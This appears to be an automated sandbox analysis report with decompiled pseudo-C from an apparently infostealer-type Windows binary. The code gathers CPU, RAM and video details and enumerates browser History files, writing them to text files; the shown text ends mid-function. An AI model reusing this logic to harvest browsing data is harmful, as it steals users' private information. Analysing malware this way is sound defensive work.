                                                                                                                                                                                          0x0041480f
                                                                                                                                                                                          0x0041481d
                                                                                                                                                                                          0x0041482b
                                                                                                                                                                                          0x00414839
                                                                                                                                                                                          0x00414847
                                                                                                                                                                                          0x00414855
                                                                                                                                                                                          0x0041485a
                                                                                                                                                                                          0x0041485d
                                                                                                                                                                                          0x0041486b
                                                                                                                                                                                          0x00414870
                                                                                                                                                                                          0x0041487e
                                                                                                                                                                                          0x00414895
                                                                                                                                                                                          0x0041489a
                                                                                                                                                                                          0x0041489d
                                                                                                                                                                                          0x004148a2
                                                                                                                                                                                          0x004148b0
                                                                                                                                                                                          0x004148c1
                                                                                                                                                                                          0x004148d2
                                                                                                                                                                                          0x004148dd
                                                                                                                                                                                          0x004148e7
                                                                                                                                                                                          0x004148f2
                                                                                                                                                                                          0x004148f3
                                                                                                                                                                                          0x004148f8
                                                                                                                                                                                          0x004148fb
                                                                                                                                                                                          0x004148ff
                                                                                                                                                                                          0x00414901
                                                                                                                                                                                          0x00414906
                                                                                                                                                                                          0x00414906
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004148ff
                                                                                                                                                                                          0x0041462b
                                                                                                                                                                                          0x00414632
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414643
                                                                                                                                                                                          0x00414644
                                                                                                                                                                                          0x00414645
                                                                                                                                                                                          0x00414648
                                                                                                                                                                                          0x00414649
                                                                                                                                                                                          0x0041464d
                                                                                                                                                                                          0x0041465e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414664
                                                                                                                                                                                          0x0041466e
                                                                                                                                                                                          0x0041466f
                                                                                                                                                                                          0x00414671
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414677
                                                                                                                                                                                          0x00414678
                                                                                                                                                                                          0x00414678
                                                                                                                                                                                          0x0041467a
                                                                                                                                                                                          0x00414683
                                                                                                                                                                                          0x00414694
                                                                                                                                                                                          0x0041469b
                                                                                                                                                                                          0x0041469d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$FileFindFirst
                                                                                                                                                                                          • String ID: .LNK$._.$0_@$LLA$CA
                                                                                                                                                                                          • API String ID: 1653790112-882170572
                                                                                                                                                                                          • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                          • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                                                                                                                                          • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
                                                                                                                                                                                          				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                          				intOrPtr _t113;
                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                          				intOrPtr _t120;
                                                                                                                                                                                          				intOrPtr _t121;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t118 = __esi;
                                                                                                                                                                                          				_t38 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t38 =  *_t38 + _t38;
                                                                                                                                                                                          				_t39 = _t38 | 0x5500000a;
                                                                                                                                                                                          				_t120 = _t121;
                                                                                                                                                                                          				_t93 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t93 = _t93 - 1;
                                                                                                                                                                                          					_t124 = _t93;
                                                                                                                                                                                          				} while (_t93 != 0);
                                                                                                                                                                                          				_t92 = _t39;
                                                                                                                                                                                          				_push(_t120);
                                                                                                                                                                                          				_push(0x4168d4);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t121;
                                                                                                                                                                                          				GetSystemInfo( &_v40);
                                                                                                                                                                                          				E00403D2C( &_v48,  *_t92);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				_push(L"CPU Model: ");
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push( &_v52);
                                                                                                                                                                                          				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
                                                                                                                                                                                          				E00403D2C( &_v56, _v60);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_pop(_t94);
                                                                                                                                                                                          				E00407500(0x80000002, _t92, _t94, _v64);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t92, _v44);
                                                                                                                                                                                          				E004037DC( &_v80, "CPU Count: ",  *_t92);
                                                                                                                                                                                          				E00403D2C( &_v76, _v80);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
                                                                                                                                                                                          				_push(_v84);
                                                                                                                                                                                          				_push(0x416974);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t92, _v72);
                                                                                                                                                                                          				_push( *_t92);
                                                                                                                                                                                          				_push("GetRAM: ");
                                                                                                                                                                                          				E00416584( &_v88, _t92, _t118, _t124);
                                                                                                                                                                                          				_push(_v88);
                                                                                                                                                                                          				_push(0x4169ac);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t92);
                                                                                                                                                                                          				_push("Video Info\r\n");
                                                                                                                                                                                          				E00416644( &_v92, _t92, _t117, _t118);
                                                                                                                                                                                          				_push(_v92);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_t113 = 0x4169ac;
                                                                                                                                                                                          				 *[fs:eax] = _t113;
                                                                                                                                                                                          				_push(E004168DB);
                                                                                                                                                                                          				E00403508( &_v92, 2);
                                                                                                                                                                                          				E00403B80( &_v84);
                                                                                                                                                                                          				E004034E4( &_v80);
                                                                                                                                                                                          				E00403B98( &_v76, 2);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B80( &_v64);
                                                                                                                                                                                          				E004034E4( &_v60);
                                                                                                                                                                                          				return E00403B98( &_v56, 4);
                                                                                                                                                                                          			}



























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                          • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t16 = __ebx;
                                                                                                                                                                                          				 *__edi =  *__edi + __ecx;
                                                                                                                                                                                          				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
                                                                                                                                                                                          				 *0x41b00c = 2;
                                                                                                                                                                                          				 *0x41c010 = 0x4010b8;
                                                                                                                                                                                          				 *0x41c014 = 0x4010c0;
                                                                                                                                                                                          				 *0x41c036 = 2;
                                                                                                                                                                                          				 *0x41c000 = E00404568;
                                                                                                                                                                                          				if(E00402A94() != 0) {
                                                                                                                                                                                          					_t3 = E00402AC4();
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00402B88(_t3);
                                                                                                                                                                                          				 *0x41c03c = 0xd7b0;
                                                                                                                                                                                          				 *0x41c208 = 0xd7b0;
                                                                                                                                                                                          				 *0x41c3d4 = 0xd7b0;
                                                                                                                                                                                          				 *0x41c02c = GetCommandLineA();
                                                                                                                                                                                          				 *0x41c028 = E00401180();
                                                                                                                                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                                                                                          					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                                                                                          						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						 *0x41c5a8 = 3;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t11 = GetCurrentThreadId();
                                                                                                                                                                                          				 *0x41c020 = _t11;
                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                          			}


                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402A99
                                                                                                                                                                                            • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402AA5
                                                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00404C8F
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00404CA0
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                                                                                                                                            • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                          • String ID: 3
                                                                                                                                                                                          • API String ID: 3734044017-4259502353
                                                                                                                                                                                          • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                          • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                                                                                                                                          • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                          • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                          			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				intOrPtr _v656;
                                                                                                                                                                                          				char _v660;
                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                          				intOrPtr _t116;
                                                                                                                                                                                          				intOrPtr _t131;
                                                                                                                                                                                          				intOrPtr _t136;
                                                                                                                                                                                          				intOrPtr _t148;
                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t146 = __esi;
                                                                                                                                                                                          				_t145 = __edi;
                                                                                                                                                                                          				_pop(_t114);
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_pop(_t147);
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_t58 = __eax | 0x00000a00;
                                                                                                                                                                                          				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                          				 *_t58 =  *_t58 + __ecx;
                                                                                                                                                                                          				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                          				 *0xd000a00 =  *0xd000a00 + __ecx;
                                                                                                                                                                                          				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
                                                                                                                                                                                          				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                          				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t148 = _t149;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t116 = 0x51;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t116 = _t116 - 1;
                                                                                                                                                                                          				} while (_t116 != 0);
                                                                                                                                                                                          				_push(_t116);
                                                                                                                                                                                          				_t7 =  &_v8;
                                                                                                                                                                                          				 *_t7 = _t116;
                                                                                                                                                                                          				_push(_t114);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t7;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t58;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				_push(_t148);
                                                                                                                                                                                          				_push(0x412fe0);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t149;
                                                                                                                                                                                          				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                          				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                          					_push(0x413008);
                                                                                                                                                                                          					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          					_push(_v628);
                                                                                                                                                                                          					_push(0x413008);
                                                                                                                                                                                          					E0040813C(0x61,  &_v632);
                                                                                                                                                                                          					_push(_v632);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					if(E004076B0(_v624, _t114, 0x104) != 0) {
                                                                                                                                                                                          						_push(_t148);
                                                                                                                                                                                          						_push(0x412f54);
                                                                                                                                                                                          						_push( *[fs:eax]);
                                                                                                                                                                                          						 *[fs:eax] = _t149;
                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                          							_push(_v8);
                                                                                                                                                                                          							_push(0x413008);
                                                                                                                                                                                          							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v648);
                                                                                                                                                                                          							_push(L"\\History");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
                                                                                                                                                                                          							E0040377C( &_v636, _v640);
                                                                                                                                                                                          							_push(_v636);
                                                                                                                                                                                          							_push(_v16);
                                                                                                                                                                                          							_push(0x413008);
                                                                                                                                                                                          							_push(_v12);
                                                                                                                                                                                          							_push(0x413028);
                                                                                                                                                                                          							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v660);
                                                                                                                                                                                          							_push(L".txt");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E0040377C( &_v652, _v656);
                                                                                                                                                                                          							_pop(_t112);
                                                                                                                                                                                          							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_pop(_t136);
                                                                                                                                                                                          						 *[fs:eax] = _t136;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                          				FindClose(_v24);
                                                                                                                                                                                          				_pop(_t131);
                                                                                                                                                                                          				 *[fs:eax] = _t131;
                                                                                                                                                                                          				_push(E00412FE7);
                                                                                                                                                                                          				E00403B98( &_v660, 2);
                                                                                                                                                                                          				E004034E4( &_v652);
                                                                                                                                                                                          				E00403B98( &_v648, 3);
                                                                                                                                                                                          				E004034E4( &_v636);
                                                                                                                                                                                          				E00403B98( &_v632, 4);
                                                                                                                                                                                          				return E00403B98( &_v16, 3);
                                                                                                                                                                                          			}





























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\History
                                                                                                                                                                                          • API String ID: 1974802433-2232271174
                                                                                                                                                                                          • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                          • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				intOrPtr _v656;
                                                                                                                                                                                          				char _v660;
                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                                          				intOrPtr _t124;
                                                                                                                                                                                          				intOrPtr _t129;
                                                                                                                                                                                          				intOrPtr _t141;
                                                                                                                                                                                          				intOrPtr _t142;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t139 = __esi;
                                                                                                                                                                                          				_t138 = __edi;
                                                                                                                                                                                          				_t107 = __ebx;
                                                                                                                                                                                          				_t141 = _t142;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t109 = 0x51;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t109 = _t109 - 1;
                                                                                                                                                                                          				} while (_t109 != 0);
                                                                                                                                                                                          				_push(_t109);
                                                                                                                                                                                          				_t1 =  &_v8;
                                                                                                                                                                                          				 *_t1 = _t109;
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t1;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				_push(_t141);
                                                                                                                                                                                          				_push(0x412fe0);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t142;
                                                                                                                                                                                          				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                          				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                          					_push(0x413008);
                                                                                                                                                                                          					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          					_push(_v628);
                                                                                                                                                                                          					_push(0x413008);
                                                                                                                                                                                          					E0040813C(0x61,  &_v632);
                                                                                                                                                                                          					_push(_v632);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					if(E004076B0(_v624, _t107, 0x104) != 0) {
                                                                                                                                                                                          						_push(_t141);
                                                                                                                                                                                          						_push(0x412f54);
                                                                                                                                                                                          						_push( *[fs:eax]);
                                                                                                                                                                                          						 *[fs:eax] = _t142;
                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                          							_push(_v8);
                                                                                                                                                                                          							_push(0x413008);
                                                                                                                                                                                          							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v648);
                                                                                                                                                                                          							_push(L"\\History");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
                                                                                                                                                                                          							E0040377C( &_v636, _v640);
                                                                                                                                                                                          							_push(_v636);
                                                                                                                                                                                          							_push(_v16);
                                                                                                                                                                                          							_push(0x413008);
                                                                                                                                                                                          							_push(_v12);
                                                                                                                                                                                          							_push(0x413028);
                                                                                                                                                                                          							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v660);
                                                                                                                                                                                          							_push(L".txt");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E0040377C( &_v652, _v656);
                                                                                                                                                                                          							_pop(_t105);
                                                                                                                                                                                          							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_pop(_t129);
                                                                                                                                                                                          						 *[fs:eax] = _t129;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                          				FindClose(_v24);
                                                                                                                                                                                          				_pop(_t124);
                                                                                                                                                                                          				 *[fs:eax] = _t124;
                                                                                                                                                                                          				_push(E00412FE7);
                                                                                                                                                                                          				E00403B98( &_v660, 2);
                                                                                                                                                                                          				E004034E4( &_v652);
                                                                                                                                                                                          				E00403B98( &_v648, 3);
                                                                                                                                                                                          				E004034E4( &_v636);
                                                                                                                                                                                          				E00403B98( &_v632, 4);
                                                                                                                                                                                          				return E00403B98( &_v16, 3);
                                                                                                                                                                                          			}


























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\History
                                                                                                                                                                                          • API String ID: 1974802433-2232271174
                                                                                                                                                                                          • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                          • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
• Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 44%
E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    void* _v24;
    struct _WIN32_FIND_DATAW _v616;
    char _v620;
    intOrPtr _v624;
    char _v628;
    char _v632;
    char _v636;
    char _v640;
    char _v644;
    char _v648;
    char _v652;
    intOrPtr _v656;
    char _v660;
    void* _t103;
    intOrPtr _t108;
    intOrPtr _t123;
    intOrPtr _t136;
    intOrPtr _t140;
    intOrPtr _t141;

    _t138 = __esi;
    _t137 = __edi;
    _t106 = __ebx;
    _t140 = _t141;
    _push(__ecx);
    _t108 = 0x51;
    do {
        _push(0);
        _push(0);
        _t108 = _t108 - 1;
    } while (_t108 != 0);
    _push(_t108);
    _t1 =  &_v8;
     *_t1 = _t108;
    _push(__ebx);
    _push(__esi);
    _push(__edi);
    _v16 =  *_t1;
    _v12 = __edx;
    _v8 = __eax;
    E004040F4( &_v8);
    E004040F4( &_v12);
    E004040F4( &_v16);
    _push(_t140);
    _push(0x413276);
    _push( *[fs:eax]);
     *[fs:eax] = _t141;
